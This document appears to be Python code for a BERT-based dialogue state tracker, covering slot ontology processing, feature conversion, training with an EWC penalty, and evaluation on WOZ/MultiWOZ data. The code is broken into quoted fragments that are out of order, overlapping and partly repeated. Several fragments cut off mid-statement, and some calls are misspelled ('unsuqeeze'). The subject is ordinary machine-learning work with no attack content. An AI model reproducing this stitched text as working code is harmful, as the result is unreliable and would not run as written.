model.load_state_dict(state) model.to(device) ## Get slot-value embeddings", "= ptr_model[key] del ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value", "l * prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else:", "summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps", "logging import argparse import random import collections import operator from tqdm import tqdm,", "for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items", "(label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy,", "value labels of Present task label_list = prev_label_list + target_label_list # All slot", "p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [", "(epoch, dev_loss, dev_acc)) #if epoch > 100 and last_update + args.patience <= epoch:", "case that slot and values are different between the training and evaluation ptr_model", "rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance", "n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter:", "Build the models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import", "summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for i, slot", "text_a = line[2] # line[2]: user utterance text_b = line[3] # line[3]: system", "perform linear learning rate warmup for. \" \"E.g., 0.1 = 10%% of training.\")", "\"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys():", "= round(dev_loss, 6) if last_update is None or dev_loss < best_loss: # Save", "= torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features],", "= \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot,", "`InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection", "type=int, default=1, help=\"Number of updates steps to accumulate before performing a backward/update pass.\")", "for key in del_list: del ptr_model[key] for key in rename_list: new_key = key.replace('rnn.',", "domain if slot == \"pricerange\": slot = \"price range\" if idx in self.target_slot_idx:", "type=int, help=\"The maximum total input sequence length after WordPiece tokenization. \\n\" \"Sequences longer", "input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx <", "= all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length,", "length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break", "[len(labels) for labels in label_list] # Number of labels of all slots #prev_slot_id", "train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ##", "all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\",", "prev_label=None): self.guid = guid self.text_a = text_a self.text_b = text_b self.label = label", "args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\") ###############################################################################", "label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length ==", "[] rename_list = [] for key in ptr_model.keys(): if ('slot_lookup' in key) or", "import BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import", "base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See", "default=64, type=int, help=\"The maximum total input sequence length after WordPiece tokenization. \\n\" \"Sequences", "= ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1:", "loss_ewc if args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss)", "model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [], [] for labels", "tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids", "l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is", "# All slot value labels num_labels = [len(labels) for labels in label_list] #", "prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss =", "= [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0", "writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir,", "for idx, domain in enumerate(ontology_items): slot, value = domain if slot == \"pricerange\":", "return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [", "x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog)", "fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key in ptr_model.keys(): if", "number of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\",", "-1, max_len) for slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50,", "= [] nlabels = 0 for sid, slot in enumerate(class_count): slot_class_acc = 0", "loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss =", "dev_loss, dev_acc)) #if epoch > 100 and last_update + args.patience <= epoch: if", "acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if", "set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value", "torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length):", "all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev,", "len(processor.all_slot))) # list of slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir,", "eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy =", "= dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i,", "data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated", "/ args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances", "prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step)", "parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head',", "self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot]", "Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs ==", "else label def _get_label(label, label_list): label_id = [] label_info = '' label_map =", "all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)", "= [] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([", "Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)", "prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if", "label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc,", "= [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length", "flag if you want to set the label encoder trainable. \\n\" \"This option", "(max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx", "not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\")", "x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for x in", "args.patience <= epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir,", "= None examples = [] for (i, line) in enumerate(lines): guid = \"%s-%s-%s\"", "os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists and is", "type=str, required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True,", "int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')])", "summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" %", "on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test", "eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot is", "','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in", "trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(),", "if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if", "- 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a +", "label[0] == -1: break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '')", "#prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) #", "l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l *", "del ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids,", "in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in", "seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x", "prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss", "self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b,", "args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x,", "= batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids,", "> -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn", "data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected in the list:", "\"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\") for", "== labels) def warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup", "torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() *", "'#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else:", "else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b =", "= lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on validation dataset", "size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\",", "the maximum length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b) if total_length <=", "apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model = DDP(model) elif", "for sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot):", "prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0] else:", "model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples,", "to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling", "eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot,", "'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value in slot_idx.items():", "args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) /", "pair in place to the maximum length.\"\"\" while True: total_length = len(tokens_a) +", "torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed backend which will take", "# The symbol '#' will be replaced with '[SEP]' after tokenization. text_a =", "[ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [", "in previous tasks class DataProcessor(object): \"\"\"Base class for data converters for sequence classification", "= None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc =", "config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology =", "[] for key in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key):", "torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX", "os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir))", "FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else:", "+= '%s (id = %d) ' % (label, label_map[i][label]) return label_id, label_info features", "%d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data", "label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label embeddings:", "model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [], []", "in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence", "np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval", "help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run", "1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2)", "Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss,", "nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch =", "else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch,", "', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See", "raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps =", "analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer:", "############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank()", "rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state = model.state_dict()", "rename_list.append(key) for key in del_list: del ptr_model[key] for key in rename_list: new_key =", "label_id = [] label_info = '' label_map = [{_label: i for i, _label", "slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)", "','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev", "from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should", "label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a", "= %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len,", "for epoch in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps =", "label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding", "alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ +", "+ text_b else: text_a = line[2] # line[2]: user utterance text_b = line[3]", "else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: #", "[ len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw = 5 for", "* (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if", "optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1: t_total = t_total", "= [ line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx] for idx", "bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory", "in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids,", "= line[3] # line[3]: system response label = [ line[4+idx] for idx in", "logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size", "enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn", "= 0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):", "prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev", "+ l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples", "prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and", "# wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous task", "model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples", "data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the train", "for line in reader: if len(line) > 0 and line[0][0] == '#': #", "input_len = [len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] =", "all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data)", "class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid],", "curr_dialogue_idx): if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)]", "print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0,", "1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot in range(nslot):", "this training task self.prev_label = prev_label # trained slots in previous tasks class", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc", "label_list): label_id = [] label_info = '' label_map = [{_label: i for i,", "[0] * (max_seq_length - len(input_ids)) # Note: padding idx = 0 assert len(input_ids)", "prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss += loss.item()", "len(line) > 0 and line[0][0] == '#': # ignore comments (starting with '#')", "seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger", "Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor,", "list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do", "1 # Perform evaluation on validation dataset model.eval() dev_loss = 0 dev_acc =", "= 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t", "loss = loss_ + args.lambda_ewc * loss_ewc else: loss_, _, acc, acc_slot, _", "logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer =", "as writer: logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s =", "acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step", "= tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len =", "global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for i,", "eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot,", "the training and dev sets.\"\"\" prev_dialogue_index = None examples = [] for (i,", "if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for", "https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model = DDP(model) elif n_gpu >", "prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc, acc_slot,", "prev_label_ids = batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0)", "in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot", "i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot +=", "either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device)", "line[1]) # line[0]: dialogue index, line[1]: turn index if accumulation: if prev_dialogue_index is", "tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad", "rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\")", "batch) input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids =", "idx in self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid,", "DDP except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed", "= prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples", "assert len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f in features],", "FusedAdam except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed", "help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training", "[\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to", "base class.\"\"\" return [ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base", "= all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples =", "Note: padding idx = 0 assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label,", "prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc =", "prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)]", "if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens =", "the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected in the", "max_seq_length - 3) else: # Account for [CLS] and [SEP] with \"- 2\"", "if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate},", "'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters =", "class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base", "{}, distributed training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16))", "TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler", "if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total =", "= SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0", "= (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot in range(nslot): for turn", "args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length,", "idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\")", "eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float,", "in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0)", "== 1: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines =", "model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len", "= (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex 